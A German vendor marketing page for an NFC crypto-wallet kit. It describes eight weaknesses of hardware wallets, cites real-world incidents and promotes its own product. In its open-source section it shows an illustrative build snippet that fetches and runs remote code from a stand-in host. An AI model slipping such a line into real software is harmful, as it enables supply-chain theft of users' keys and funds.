8 Schwachstellen Open Source Checkliste FAQ
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Wallet erstellenErstellen
Hardware-Wallets · nicht offensichtliche Schwachstellen

Nicht offensichtliche Schwachstellen der Hardware-Wallet

Sie kaufen ein Gerät, um Löcher zu schließen. Mit ihm kommen neue: Firmware, Updates, ein Dienst auf dem Computer, Display, Verpackung, Kundenkonto beim Hersteller. Acht Details, die Reviews als Pluspunkte führen — und acht Wege, über die 2020–2026 Geld abgezogen wurde.

Reale Fälle mit Daten und Summen Nach Herstellerdokumentation Unser Kit prüfen wir an derselben Liste
Preis des Fehlersöffentliche Fälle
2026Coldcard · schwache Zufälligkeit in der Firmware100+ Mio. $
2025Bybit · Unterzeichner signierten nicht das, was sie sahen1,5 Mrd. $
2024Dark Skippy · Seed leckt über zwei SignaturenForschung
2023Ledger Connect Kit · Hintertür in der Bibliothek600 Tsd. $
2021Gefälschte Wallet-App im App Store17,1 BTC
2020Ledger-Kundenleck · Phishing jahrelang270 000 Personen
Acht Schwachstellen

Jedes Detail, das Reviews loben, ist ein eigenes Loch

Eine Hardware-Wallet schließt ein Loch: der Schlüssel liegt nicht mehr auf dem Telefon mit Internet. Aber das Gerät ist nicht leer. Es hat Firmware, Updates, eine Desktop-App, ein Display, eine Verpackung, einen Verkäufer mit Ihrer Adresse — und jedes Detail fügt eine Angriffsfläche hinzu, die Sie vorher nicht hatten. Unten acht solcher Details: was Reviews dazu schreiben, wie darüber Geld abgezogen wurde, wie man die Schwachstelle schließt und ob unser Kit dieses Detail hat.

Schwachstelle 01

Firmware, die Ihren Schlüssel erzeugt

In Reviews: „geschützter Chip, der Schlüssel entsteht im Gerät und verlässt es nie“

Der Schlüssel ist eine riesige Zufallszahl — und die Firmware erzeugt sie. Ein Fehler darin, und es gibt in Wahrheit zu wenige Schlüssel: sie werden bei allen Besitzern zugleich durchprobiert, ohne Zugriff auf das Gerät, Jahre nach dem Kauf. Der Chip ist unschuldig; das Loch sitzt darüber.

Fall
100+ Mio. $
Coldcard, Juli 2026: ein Firmware-Build-Fehler seit 2021 ersetzte still den Hardware-Zufallsgenerator durch einen schwachen, der mit Geräte-ID und Timer gesät war. Die Schlüsselstärke fiel auf etwa 40 Bit; 5.000+ Adressen wurden geleert.
So schließen Sie die Schwachstelle
Ob Sie eigene Zufälligkeit mitbringen können: Würfelwürfe, eine eigene Phrase. Eine Wallet, die Entropie von Ihnen annimmt, hängt nicht an einem Firmware-Fehler.
Dieses Detail haben wir nicht
Auf der Karte gibt es keine Firmware — sie ist ein verschlüsselter Träger. Den Schlüssel erzeugt Mitilena Air aus dem System-Zufallsgenerator des Geräts, und Sie können eine eigene Seed-Phrase statt Zufallswörtern setzen.
Schwachstelle 02

Updates, die Sie installieren müssen

In Reviews: „der Hersteller veröffentlicht regelmäßig Sicherheitsupdates“

Jedes Update ist der Moment, in dem Firmware ausgetauscht werden kann. Manipulierte Firmware versteckt Seed-Stücke in zwei–drei normalen Signaturen — außen wirkt das Gerät wie immer. Nicht updaten geht auch nicht: Löcher werden genau über Updates geflickt.

Fall
2 Signaturen
Dark Skippy, August 2024: Forscher zeigten, dass bösartige Hardware-Wallet-Firmware den gesamten Seed über zwei Transaktionen abzieht. Einmal vom falschen Ort updaten reicht.
So schließen Sie die Schwachstelle
Woher Firmware kommt und ob das Gerät ihre Signatur prüft. Am besten, wenn es gar nichts zu updaten gibt.
Dieses Detail haben wir nicht
Auf der Karte gibt es nichts zu updaten und nichts zu ersetzen. Signiert die App auf dem Telefon — Builds sind signiert und kommen aus App Store und Google Play, wie bei jeder App, die Sie sehen und selbst schließen.
Schwachstelle 03 · Spüren Sie den Widersinn
In Reviews: „praktische Hersteller-App für den Computer“

Eine Wallet für Misstrauen — mit Dienst im Lieferumfang

Sie kaufen das Gerät aus einem Grund: dem Computer nicht mehr zu vertrauen. Damit es läuft, muss auf denselben Computer ein Hintergrunddienst. Sie haben ihn nicht geschrieben, nicht gestartet und kontrollieren ihn nicht: er startet mit dem System, lauscht auf einem Port, den jede lokale App anklopfen kann, und tut gerade etwas — was genau, wissen Sie nicht und prüfen Sie nie.

Er hing im Hintergrund, auch nachdem Sie die Wallet geschlossen hatten. Jahrelang. Bei einem der größten Hersteller war das ein eigener „Brücken“-Dienst; 2025 steckten sie ihn in die App selbst — der Dienst ist da, stirbt nur mit dem Fenster. Bei den meisten anderen ist das Gerät ohne Desktop-Programm ein Anhänger. Unter Linux: udev-Regeln, sonst gibt das System USB nicht frei.

Also: das Ding, das Sie kauften, um unabhängig von Desktop-Software zu sein, läuft ohne Desktop-Software nicht. Und nicht der, die Sie sehen — sondern der, die darunter läuft.

Dieses Detail haben wir nicht
Auf den Computer kommt nichts: kein Dienst, kein Treiber, kein Port. Vermittler ist der NFC-Chip, der schon in Ihrem Telefon steckt, vom Telefonhersteller stammt und dem Betriebssystem gehorcht: er arbeitet nur, wenn die App offen ist und Sie die Karte selbst anlegen — und das Telefon fragt jedes Mal um Erlaubnis. Die Karte ist passiv: keine Batterie, kein Funk, sie tut selbst nichts. App zu — nichts läuft ohne Sie. Ehrlich: eine Telefon-App braucht es, und sie ist wie jede andere — Sie sehen sie, starten und schließen sie selbst. Im Abstellraum wohnt niemand.
SystemüberwachungWALLET GESCHLOSSEN
ProzessStatusLäuft
HW Wallet AppWallet
von Ihnen geschlossen-
hwwalletdHintergrunddienst · USB-Brücke
läuft412 T. 06:14
vom System beim Login gestartetnicht beendbar — das ist ein Dienst
Mockup, Namen fiktiv. So wirkte ein Computer mit einer der beliebtesten USB-Wallets bis 2025; danach steckte man die „Brücke“ in die App — derselbe Dienst, nur nicht mehr in der Liste sichtbar.
Allegorie
Ein Haus für Privatsphäre — und ein Bewohner im Abstellraum

Sie wollten ein Haus für Privatsphäre. Gekauft. Dann brauchte es Sicherheit — installiert. Damit der Tarif läuft, sollten Sie einen Uniformierten hereinlassen, der rund um die Uhr im Abstellraum wohnt, Schlüssel zu allen Türen hat und nicht Ihnen berichtet. Sie haben ihn nicht eingestellt, können ihn nicht kündigen, und was er nachts tut — wissen Sie nicht.

Natürlich „einer von uns“. Steht so im Vertrag. Sie wollten Privatsphäre und bekamen ein Surrogat: ein Haus mit einem Bewohner, den Sie nicht gewählt haben.

Schwachstelle 04 · Open Source ist kein Audit
In Reviews: „Open Source — jeder kann prüfen“

Open Source ist ein Weg für Programmierer, zusammenzuarbeiten — kein Siegel, dass die Software nicht stiehlt

Open Source wurde erfunden, um Programme zu teilen und gemeinsam zu reparieren. Als Werkzeug der Zusammenarbeit ist es großartig. Ein Qualitätssiegel „diese Software stiehlt Ihr Geld nicht“ war es nie — warum: Sie nutzen nicht den Quellcode. Sie nutzen das, was Sie heruntergeladen haben.

Zwischen GitHub-Repo und Datei auf dem Telefon liegen Build, App-Store, Update, Server. An jedem Schritt kann eine Zeile landen, die irgendetwas von irgendwo lädt — und im Repo fehlt sie. Ihre Kopie mit dem Quelltext vergleichen können Sie nicht: Stores liefern Binaries, die Web-Wallet holt bei jedem Öffnen den Code, den der Server heute genau Ihnen gibt, Browser-Erweiterungen updaten nachts still.

„Offen“ heißt: irgendwelche Leute können irgendwann irgendeine Version prüfen. Was Ihre Kopie gerade jetzt tut — bedeutet das nicht.

Im Repo · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Auf Ihrem Telefon · app-2.4.21.min.js
// send.js — Build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Eine Zeile im Build. Im Repo fehlt sie, im Store sieht man sie nicht — bei Ihnen läuft sie.
Offenheit hat keinen dieser Fälle verhindert
Ledger Connect Kit2023
offene Bibliothek auf GitHub; eine Schadversion landete in npm, Dutzende Sites luden sie live in Stunden
Copay / event-stream2018
offene Wallet; die Hintertür kam über eine Abhängigkeit, die genau darauf zielte
xz utils2024
zwanzig Jahre offen; ein Backdoor saß in Releases, bis ein Engineer zufällig merkte, dass SSH-Login eine halbe Sekunde langsamer war
Coldcard2026
Firmware mit offenem Code; fünf Jahre ersetzte ein Build-Fehler den Hardware-Generator durch einen schwachen — Schlüssel durchprobiert ohne Gerätezugriff, 5.000+ Adressen, 100+ Mio. Dollar
Was dann funktioniert
Nicht fremden Code lesen — sondern zwei Checks, die jeder kann. Erstens Verhaltensaudit: lokalen interceptierenden Proxy, App durchleiten, sehen was wohin geht. Code muss man nicht lesen — der Traffic ist sichtbar. Zweitens Architektur, in der Code nichts zu stehlen hat: liegt der Schlüssel nie auf einem Gerät mit Internet, ist jede Zeile in jedem Update machtlos — sie hat nichts zu senden.
Bei uns
Erstens bieten wir selbst an: unsere App durch einen Proxy, die Web-Version durch Browser-DevTools — und jeden Request ansehen. Signaturschlüssel und Seed erscheinen nicht; einzige Ausnahme ist der Monero-View-Key, dazu die Seite „Wie die Wallet Krypto sendet“. Zweitens im Kit: der Schlüssel entsteht in Mitilena Air auf einem Gerät ohne Internet, lebt auf der Karte, und in die Online-App kommt nur die Signatur — dort gibt es nichts zu proxen. Und Offline ist hier echt: im Air-Gap ist das Schlüsselgerät an nichts angebunden — kein Kabel, kein Bluetooth; die Transaktion geht per QR hinein und hinaus, den Sie mit den Augen sehen. Keine „Cold“-Wallet am Kabel, die am Online-PC mit eigenem Dienst hängt und Unbekanntes austauscht.
Schwachstelle 05

Display, auf dem man nicht sieht, was man signiert

In Reviews: „Bestätigung auf dem Gerätedisplay — ein Virus am PC ist machtlos“

Das Display ist klein, und oft stehen dort nicht Adresse und Betrag, sondern ein Hash oder „Contract Call“. Sie bestätigen, was Sie nicht sehen — und die Signatur ist trotzdem echt, Ihre. Das Display gibt ein Kontrollgefühl, das fehlt.

Fall
1,5 Mrd. $
Bybit, Februar 2025: Unterzeichner mit Hardware-Wallets bestätigten eine Überweisung, die in der UI normal wirkte. Die Geräte zeigten Daten, die ein Mensch nicht abgleichen konnte.
So schließen Sie die Schwachstelle
Empfänger, Betrag und Vorgangstyp in Klartext, nicht als Hash — und Ablehnen mit einem Knopf.
Bei uns
Ein Display gibt es — das des Telefons: Adresse, Betrag und Anfragetyp in Worten — Überweisung, Contract Call, Freigabe — und die Taste „Ablehnen“. Für große Summen: separates Gerät ohne Netz, auf dem die Transaktion vollständig ankommt.
Schwachstelle 06

Karton, in dem der Seed schon liegt

In Reviews: „kommt in versiegelter Verpackung mit Siegel“

Ein physisches Gerät heißt Versand, Zwischenhändler und Marktplätze „im Angebot“. Die Wallet kommt vorkonfiguriert, mit Seed auf einem Zettel drin. Oder ein Doppelgänger in Stores bittet, „den Seed zur Aktivierung einzugeben“.

Fall
17,1 BTC
App Store, 2021: ein Hardware-Wallet-Besitzer gab den Seed in eine Doppelgänger-App und verlor 17,1 BTC. Im selben Jahr bekamen Ledger-Kunden nach dem Datenleck gefälschte Geräte mit dem Brief „Seed auf das neue Gerät migrieren“.
So schließen Sie die Schwachstelle
Selbst initialisieren und nie einen Seed nutzen, der schon geschrieben ankommt. Das Siegel ist kein Check; der Check ist: Sie erzeugen den Schlüssel.
Bei uns
Karten kommen leer: Sie erzeugen und schreiben den Schlüssel selbst — einen „fertigen“ Seed im Karton kann es nicht geben. Die App nur aus App Store und Google Play über Links von der Website; den Seed fragt sie nur bei Import und Signatur.
Schwachstelle 07

Kundenkonto beim Hersteller

In Reviews: „offizielle Garantie, Support und Kundenkonto“

Um zu kaufen, hinterlassen Sie dem Hersteller Name, E-Mail und Lieferadresse. Ihre Sicherheit hängt an seiner Datenbank. Leckt sie — und jahrelang schreiben Ihnen „bestätigen Sie den Seed auf dem neuen Gerät“, manchmal mit Paketen.

Fall
270 000 Personen
Ledger, 2020: Daten von 270.000 Käufern inklusive Postadressen leckten. Briefe, Anrufe und Pakete mit der Bitte, den Seed zu „migrieren“, laufen bis heute.
So schließen Sie die Schwachstelle
Je weniger man über Sie weiß, desto kürzer der Vektor: Kauf ohne Konto, Support, der nie nach dem Seed fragt, und die Regel „nach dem Seed fragt nur der Dieb“.
Dieses Detail haben wir nicht
Die Wallet läuft ohne Registrierung, es gibt kein Konto. Dem Verkäufer ist nur die Lieferadresse bekannt. Weder Support noch App fragen nach dem Seed.
Schwachstelle 08

Ein Gerät und ein Zettel

In Reviews: „robustes Gehäuse, großes Display, Akku für eine Woche“

Je mehr Teile, desto mehr bricht: Stecker, Display, Akku. Die Wiederherstellung hängt an einem Seed-Zettel — nass geworden, beim Umzug verloren, „sicherheitshalber“ fotografiert. Der häufigste Verlustgrund ist kein Hack.

Fall
≈20 % BTC
Laut Chainalysis ist etwa ein Fünftel aller Bitcoins für immer weg — vor allem durch verlorene Schlüssel, nicht durch Hacks.
So schließen Sie die Schwachstelle
Wie viele Schlüsselkopien liegen im Karton und in welcher Form, was bei Geräteverlust passiert, ob es etwas zu zerbrechen gibt.
Dieses Detail haben wir nicht
Kein Display, kein Akku, kein Stecker — nichts zu zerbrechen. Und nicht eine Kopie, sondern fünf Spiegel aus dem Karton: zwei NFC-Karten und drei Stealth-Sticker in wasserdichtem Kunststoff, 10+ Jahre.
Checkliste

Was in der Wallet nicht drin sein darf

Acht Details zu acht Schwachstellen. Die Liste gilt für jede Wallet — Hardware, mobil, Browser. Haken Sie ab, was die gewählte hat — und unsere auch.

01
Schlüssel, den nur die Software erzeugtohne Ihre Zufälligkeit — eigene Phrase oder Würfel
02
Updates dort, wo der Schlüssel liegtjedes Update — Chance zum Austausch
03
Dienst, Treiber oder Port am Computersiehe Schwachstelle 03
04
„Open-Source“-Badge statt ArchitekturSchlüssel dort, wo fremder Code landen kann
05
Display mit Hash statt Adresse und Betragund keine Taste „Ablehnen“
06
Seed, der schon geschrieben ankommtim Karton, im Brief, in der „Aktivierungs-App“
07
Kundenkonto beim Herstellerund Support, der nach dem Seed fragen darf
08
Einzige Kopie und Teile, die zerbrechenDisplay, Akku, Stecker, ein Zettel
Das Ultimate-Kit hat nach dieser Liste keine der acht Details. Im Karton: 2 NFC-Karten und 3 Stealth-Sticker, Mitilena Air (Schlüssel ohne Internet) und Mitilena Keys (Signatur ohne Internet). Karten kommen leer: Schlüssel erzeugen und verschlüsseln Sie — nicht der Werkschip. Inhalt und Preis →
Ultimate · Offline-Kit

Kein werkseitiger „Security-Chip“ — ein Träger, den Sie verschlüsseln

Karten kommen leer an. Den Schlüssel erzeugen Sie in Mitilena Air auf einem Telefon ohne Internet und schreiben ihn selbst. Signatur über Mitilena Keys, ebenfalls ohne Netz: die Transaktion läuft per QR. Im Karton fünf gleiche Kopien: 2 NFC-Karten und 3 Stealth-Sticker in wasserdichtem Kunststoff. 18 Netzwerke, 20.000+ Coins, inklusive USDT.

Nichts wird auf dem Computer installiert
Keine Firmware, keine Updates, kein Display, kein Akku
Transaktion ins Offline-Telefon — per Ton oder QR, ohne Kabel und USB
Funktioniert mit der kostenlosen Mitilena-App auf dem Telefon
Wasserdichter Kunststoff, Haltbarkeit 10+ Jahre
Versand aus Prag: Europa 3–5 Tage, weltweit ca. 7 Tage
Mitilena-NFC-Karte
Ultimate · Generierung und Signatur ohne Netz
€369€439
2 NFC-Karten · 3 Stealth-Sticker · Mitilena Air · Lizenz Mitilena Keys
Ultimate bestellen · €369 Basic und Premium — ab €79
FAQ

Was man fragt, wenn man bis hier gelesen hat

Vorteile und Nachteile der Hardware-Wallet — kurz?

Ein Plus, und es ist groß: der Schlüssel liegt nicht auf dem Telefon mit Internet. Die Nachteile — die acht Details oben; jedes fügt Angriffsfläche hinzu. Eine gute Hardware-Wallet hat weniger Details, nicht mehr.

Und wenn das Telefon infiziert ist?

Mit der Karte auf dem Haupttelefon erscheint der Schlüssel in einer isolierten Umgebung für die Sekunde der Signatur — dasselbe Risiko wie bei jeder Telefon-Wallet, nur kürzer. Für Summen, vor denen einem angst ist — zweite Stufe: Signatur auf einem separaten Gerät ohne Internet, wohin die Transaktion per QR kommt.

Was, wenn die Karte gestohlen oder verloren geht?

Ohne Passwort sind Karte und Sticker nutzloser Kunststoff — der Schlüssel darauf ist verschlüsselt. Eine verlorene Kopie ersetzen die anderen vier: zwei Karten und drei Sticker aus dem Karton — gespiegelt.

Muss man die Firmware einer Hardware-Wallet updaten?

Wenn der Hersteller ein Loch schließt — ja, und genau dann lässt sich Firmware austauschen: Quelle und Signatur prüfen. Ein Träger ohne Firmware hat diese Wahl nicht — nichts zu updaten, nichts zu ersetzen.

Worin unterscheidet sich das von einer USB-Wallet?

Durch fehlende Zwischenhändler: kein Kabel, kein Treiber, kein Hintergrunddienst, keine Desktop-App. Ein Vermittler — der NFC-Chip Ihres Telefons — und der gehorcht Ihnen und dem Betriebssystem, nicht dem Wallet-Hersteller.

Open Source — heißt das sicher?

Heißt: irgendwann von jemandem prüfbar. Sie nutzen nicht den Code, sondern das Heruntergeladene, und können beides nicht vergleichen. Sicherheit gibt eine Architektur, in der der Schlüssel nicht dort liegt, wo fremder Code landen kann.

NFC-Karten mit Generierung und Signatur ohne Internet

5 Schlüsselkopien · Air · Keys · oder kostenlose Wallet in 30 Sekunden · Warum ein „kaltes“ Hardware-Gerät auf dem Chip oft Fake ist →
Ultimate bestellen · €369 Kostenlose Wallet erstellen